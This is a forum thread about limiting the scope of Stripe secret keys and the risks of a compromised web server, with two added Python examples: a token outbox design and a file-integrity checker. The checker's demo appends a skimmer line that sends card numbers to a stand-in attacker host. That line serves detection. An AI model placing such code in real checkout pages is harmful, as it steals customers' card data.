stripe.js Create Customer without Secret Key


smutt00

Nov 26, 2015, 5:01:49 PM
to Stripe API Discussion
This may already be possible.  I'm not aware of any such method for doing this, but perhaps I've missed something.

When using stripe.js on a custom form, this generates a token for the submitted credit card data.  It is then up to the back-end, where that form is submitted, to use that token to create a customer with the credit card data.  Correct?

The only way to create a customer is by using the Secret API Key. This means that the Secret API Key would have to be placed on the server. Granted, the key would be embedded in back-end PHP code and would be difficult to expose, but the chance is still there. An exploited WordPress or Drupal script on the account, which allows a PHP shell to be uploaded, would allow the viewing of the Secret API Key. (Of course, not having an exploitable script on the web server would be ideal.)

Would it be possible, or is it possible, to have a "Secret API Key" whose only function is to create a customer? I don't really like the idea of putting a "secret" key up on a public server, especially when that "secret" key can be used to run charges through our account. A dumbed-down "secret" key that can only perform some functions (like creating a customer) would seem to be ideal. That way you can store the "real" Secret API Key on a restricted network and run charges on those Customers.

As it is right now, as I understand it, the only way to create a customer is to use the Secret API Key. The same Secret API Key that can be used to run charges on any customer. So if that Secret API Key is ever compromised, a lot of damage can be done. The chances of this Secret API Key being compromised are somewhat remote, but not 0. If I'm going to put a secret key out in the open, I would rather that it have limited access.

Scott Fotheringham

Nov 27, 2015, 8:46:29 AM
to Stripe API Discussion
I think you may be overthinking the security here. Realistically, what you're saying absolutely makes sense. But the web server at some point needs to have the secret key in its possession. So no matter what you do to try and protect it, if someone got access to your web server, they've got the key anyway.

What you're better off doing is focusing on protecting your web server. Ensure only a minimum number of accounts with strong passwords, change the SSH port, restrict IP access to file transfer protocols, don't use basic FTP, use SFTP or SSH instead, etc. You could even install some software that monitors connections and alerts you to intrusions. That way you can quickly refresh your keys from the Stripe dashboard.

smutt00

Nov 27, 2015, 11:33:24 AM
to Stripe API Discussion
The web server only really needs the secret key if it's going to run the charge.  In my situation, it is not.  Granted, I can certainly understand that my situation is likely not like 90% of transactions Stripe users out there do.

All I am interested in is collecting the credit card information and storing that so that I can charge it later, from a much more isolated environment (no public inbound Internet access).

I'm a fan of least privileges.  And in the situation I have described, the web server does not need privileges to run a charge.  It only needs privileges to create a customer.

I do understand that the chances of a secret key being compromised in a well-secured environment are very remote. But the only way you are ever going to know that the secret key is compromised is after it's been compromised, which is a bit too late.

I don't know how Stripe's server authentication systems work.  I don't know if having a crippled key with access to specific functions is feasible or not, but it would seem to make sense.
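The split smutt00 is describing (a public web tier that only collects the stripe.js token, and an isolated tier that holds the key and charges later) can be built without any key at all on the public server, by having the web tier park the single-use token and letting the isolated tier pull it. The following is an added example and is not code from this thread or from Stripe; the outbox table, the `FakeStripe` stand-in (used so the example runs offline; it is not the real `stripe` library), the `tok_`/`cus_`/`sk_` prefixes as used here, the 600-second staleness window and the sample e-mail addresses are all assumptions made for the demo.

```python
"""Added example (not from the thread): the public web tier never holds the
Stripe secret key. It parks the single-use stripe.js token in an outbox; an
isolated worker that owns the secret key drains the outbox, creates the
Customer and, later, runs charges. FakeStripe is a stand-in for the Stripe API
so this runs offline; it is not the real stripe library."""
import sqlite3
import time
from dataclasses import dataclass, field


# ---- Public web tier: no API key of any kind is configured here -----------

def token_shape_ok(token: str) -> bool:
    """Cheap sanity check on a stripe.js card token before storing it
    (assumed format: a 'tok_' prefix and a modest length)."""
    return token.startswith("tok_") and 4 < len(token) <= 64


def init_outbox(conn: sqlite3.Connection) -> None:
    conn.execute(
        "CREATE TABLE IF NOT EXISTS card_outbox ("
        " id INTEGER PRIMARY KEY, token TEXT NOT NULL, email TEXT NOT NULL,"
        " created REAL NOT NULL, customer_id TEXT)"
    )


def handle_form_post(conn: sqlite3.Connection, form: dict) -> int:
    """Form handler on the web tier: it can only park a token, nothing else."""
    token = form.get("stripeToken", "")
    if not token_shape_ok(token):
        raise ValueError("bad token format")
    cur = conn.execute(
        "INSERT INTO card_outbox (token, email, created) VALUES (?, ?, ?)",
        (token, form["email"], time.time()),
    )
    conn.commit()
    return cur.lastrowid


# ---- Isolated tier: holds sk_..., pulls work, accepts no inbound traffic ---

@dataclass
class FakeStripe:
    """Offline stand-in for the Stripe API (constructed for this example)."""
    secret_key: str
    customers: dict = field(default_factory=dict)
    charges: list = field(default_factory=list)
    used_tokens: set = field(default_factory=set)

    def create_customer(self, token: str, email: str) -> str:
        if not self.secret_key.startswith("sk_"):
            raise PermissionError("secret key required")
        if token in self.used_tokens:
            raise ValueError("token already consumed")  # card tokens are single-use
        self.used_tokens.add(token)
        cid = f"cus_{len(self.customers) + 1:06d}"
        self.customers[cid] = email
        return cid

    def charge(self, customer_id: str, amount_cents: int) -> dict:
        if customer_id not in self.customers:
            raise KeyError(customer_id)
        ch = {"customer": customer_id, "amount": amount_cents}
        self.charges.append(ch)
        return ch


def drain_outbox(conn: sqlite3.Connection, stripe: FakeStripe,
                 max_age_s: float = 600.0) -> list:
    """Worker on the isolated tier: turn parked tokens into Customers and
    scrub the token afterwards. Entries older than max_age_s are dropped
    (assumed window; stale tokens should not be retried indefinitely)."""
    created = []
    rows = conn.execute(
        "SELECT id, token, email, created FROM card_outbox WHERE customer_id IS NULL"
    ).fetchall()
    for row_id, token, email, created_at in rows:
        if time.time() - created_at > max_age_s:
            conn.execute("DELETE FROM card_outbox WHERE id = ?", (row_id,))
            continue
        cid = stripe.create_customer(token, email)
        conn.execute("UPDATE card_outbox SET customer_id = ?, token = '' WHERE id = ?",
                     (cid, row_id))
        created.append(cid)
    conn.commit()
    return created


def run_demo() -> dict:
    """End-to-end run with constructed data."""
    conn = sqlite3.connect(":memory:")
    init_outbox(conn)
    handle_form_post(conn, {"stripeToken": "tok_constructed_1", "email": "a@example.com"})
    handle_form_post(conn, {"stripeToken": "tok_constructed_2", "email": "b@example.com"})
    stripe = FakeStripe(secret_key="sk_test_constructed")  # exists only on the isolated tier
    ids = drain_outbox(conn, stripe)
    tokens_left = conn.execute(
        "SELECT COUNT(*) FROM card_outbox WHERE token <> ''").fetchone()[0]
    stripe.charge(ids[0], 1999)  # charging happens here, never on the web tier
    return {"customers": ids, "tokens_left": tokens_left, "charges": len(stripe.charges)}


if __name__ == "__main__":
    print(run_demo())
```

The point of the arrangement is what a compromise of the web tier yields: a handful of single-use tokens that are worthless without a key, rather than the key itself. The isolated tier pulls from the outbox over whatever channel you already trust (in production that would be a shared database, queue or SFTP drop reachable only from the inside, not the in-memory SQLite used here), so it needs no inbound listener. It does nothing, however, about an attacker who can edit the checkout page itself, which is a separate problem from the key.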

Matthew Arkin

Nov 27, 2015, 11:58:40 AM
to Jake K.
Stripe only has public keys and secret keys, and you cannot limit the access of secret keys, nor can you allow public keys to do more than just create card tokens. It's a feature I've requested a couple of times, and I basically ended up building this for my users for Commencepayments.com.

It is important to note that the issue with a compromised server is not that your key will be stolen. Even if your API key is stolen, the amount of damage is pretty limited (if someone creates fraudulent charges you can always refund the charges; if customers get deleted they can potentially be undeleted through support). Ideally you'd be able to recognize that your key was compromised before anything too bad happens.

The big issue is that a malicious entity now has potentially unfettered access to your customers' card data: access to your server means access to your HTML, and they could now access that card data directly. Arguably this is more valuable than your API key. This is what gets you into trouble.

Matt
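Matt's point is that the served checkout HTML and JavaScript are the real prize on a compromised web server, since a one-line edit can copy card fields to an attacker before stripe.js ever tokenizes them. One concrete check a practitioner would want for that is a file-integrity baseline over the web root, compared from outside the server. The following is an added example and not code from the thread; the sample `checkout.html`, `checkout.js` (its `Stripe.card.createToken` call is a constructed placeholder), the dropped `shell.php`, the `attacker.invalid` host and the manifest format are all constructed for the demo.

```python
"""Added example (not from the thread): hash the files a web server serves,
keep the manifest off the box, and later diff the live tree against it to
catch edited checkout pages or dropped files. All sample files below are
constructed for the demo."""
import hashlib
import tempfile
from pathlib import Path


def _digest(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(webroot: Path, suffixes=(".html", ".js", ".php")) -> dict:
    """Hash every served file under webroot, keyed by path relative to it."""
    return {
        str(p.relative_to(webroot)): _digest(p)
        for p in sorted(webroot.rglob("*"))
        if p.is_file() and p.suffix in suffixes
    }


def verify(webroot: Path, manifest: dict) -> dict:
    """Diff the live tree against a trusted manifest. New files matter as
    much as modified ones: an uploaded PHP shell is a new .php file."""
    current = build_manifest(webroot)
    return {
        "modified": sorted(k for k in manifest
                           if k in current and current[k] != manifest[k]),
        "missing": sorted(k for k in manifest if k not in current),
        "added": sorted(k for k in current if k not in manifest),
    }


def run_demo() -> dict:
    """Baseline a tiny constructed web root, tamper with it, re-verify."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "checkout.html").write_text("<form id='payment-form'></form>\n")
        (root / "js" / "checkout.js").write_text(
            "Stripe.card.createToken(form, handler);  // constructed sample\n")
        baseline = build_manifest(root)

        # Simulate the compromise described above: the checkout script is
        # edited to copy the card number elsewhere, and a new PHP file appears.
        with (root / "js" / "checkout.js").open("a") as f:
            f.write("fetch('https://attacker.invalid/c?n=' + form.number.value);\n")
        (root / "shell.php").write_text("<?php /* constructed: unexpected new file */ ?>\n")
        return verify(root, baseline)


if __name__ == "__main__":
    print(run_demo())
```

Two caveats make or break this check. The manifest must be produced at deploy time and stored where the web server cannot write (a separate host or a read-only artifact store), and the comparison must run from that separate host, for instance over SFTP or a read-only mount; an attacker with root on the web server can otherwise just regenerate the manifest. It also only covers files you serve yourself, not scripts the page loads from other origins, so pair it with deploy-time review of what the checkout page actually includes.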

